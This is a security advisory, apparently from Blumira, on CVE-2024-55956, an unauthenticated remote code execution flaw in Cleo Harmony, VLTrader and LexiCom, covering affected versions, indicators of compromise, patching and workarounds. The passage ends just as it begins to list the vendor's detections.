Vulnerabilities in Cleo Software Allow for Unauthenticated Remote Code Execution via CVE-2024-55956

What Happened

On December 9th, Huntress released a threat advisory reporting a vulnerability and active exploitation of the file transfer management software offered by Cleo, a software company known for its ‘ecosystem integration platform’.

Designated as CVE-2024-55956, exploitation focuses on an unrestricted file upload and download vulnerability that could lead to remote code execution. This vulnerability affects versions prior to 5.8.0.24 of Cleo’s Harmony, VLTrader, and LexiCom software. It’s also important to note that this vulnerability has been confirmed to not require prior authentication before exploitation. Unauthenticated remote code execution vulnerabilities are valuable targets for threat actors because they allow direct system compromise without needing to bypass authentication controls or obtain valid credentials first. Huntress and Rapid7 have both confirmed observations of active exploitation attempts in the wild.

It’s also important to note that there are two CVE ID’s being attributed to this vulnerability. This may be slightly confusing, so I wanted to help in offering an explanation. 

• CVE-2024-50623 > issued to track the original remote code execution vulnerability disclosed by Cleo in October 2024. The patch released to address this CVE was revealed to be inadequate in preventing exploitation.
• CVE-2024-55956 > issued to track the bypassing of the original patch and is the current CVE used to track these Cleo remote code execution vulnerabilities.

If you are still unsure or don’t have time to dive into the specifics, just make sure your Cleo software is on 5.8.0.24 or higher. That way, you’re protected from both of these CVEs.

What That Means

Administrators managing Harmony, VLTrader, and LexiCom software should patch immediately to version 5.8.0.24 or higher. Vulnerabilities affecting these products can lead to remote code execution and allow an attacker into your network. Additionally, “in the wild” scanning and exploitation of these vulnerabilities has been confirmed by multiple sources.

Exploitation of this vulnerability allows an attacker to gain a foothold in the network. From there, they may decide to pivot within the network or act more quickly and deploy ransomware right from the initial compromised host. In some confirmed instances of exploitation, defenders have seen attackers move further into the network and attempt to perform domain reconnaissance using tools such as nltest.

Who’s Impacted

The following list has been directly lifted from the Cleo Product Security Update for CVE-2024-55956

• Cleo Harmony® (prior to version 5.8.0.24)
• Cleo VLTrader® (prior to version 5.8.0.24)
• Cleo LexiCom® (prior to version 5.8.0.24)

How Would I Know and What Should I Do

Several indicators of compromise have been revealed by Huntress researchers:

File artifacts under your Harmony, VLTrader, or LexiCom installation directory, typically under C:\ or C:\Program Files (x86) - e.g. C:\LexiCom or C:\Program Files (x86)\Lexicom. Several IPs have been associated with confirmed Cleo attacks.

Huntress researchers have collected examples of these file artifacts and have reported that they contain encoded powershell commands. Additionally, there may be a .dbg log file under the logs directory (e.g. C:\LexiCom\logs) that you can review to identify if any suspicious files have been uploaded to the autorun directory. The Cleo autorun feature and directory appears to be a pivotal component of the exploit chain.

If you suspect a Cleo instance has been compromised, you should immediately attempt to contain the incident and establish a scope. In some cases, it may be advisable to isolate the Cleo service, recover from a known-good backup, and apply the latest patches before bringing back online. It is also recommended to rotate any administrator or user account passwords local to any compromised devices.

Cleo has also offered resources for response and mitigation (behind a login)

• Unrestricted File Upload and Download Vulnerability Mitigation
• Unauthenticated Malicious Hosts Vulnerability

Workarounds

If you are unable to patch your Cleo instances in a timely manner, consider taking them offline until able to do so or at least disable any public internet access they may have. Additionally, a temporary workaround has been suggested by Huntress to limit the attack surface. They have stated that this workaround will stop execution, but, “will not prevent the arbitrary file-write vulnerability until a patch is released.” 

When Will it be Fixed?

Patches are available and have been released by Cleo

• Cleo Harmony® (version 5.8.0.24 or higher)
• Cleo VLTrader® (version 5.8.0.24 or higher)
• Cleo LexiCom® (version 5.8.0.24 or higher)

How Blumira Can Help

Blumira’s security team actively monitors this issue, and looks for additional ways that we can detect any stage of exploitation of these vulnerabilities.

Several detections and reports are available to our customers and would help reveal any possible exploitation of these vulnerabilities or post exploitation activity: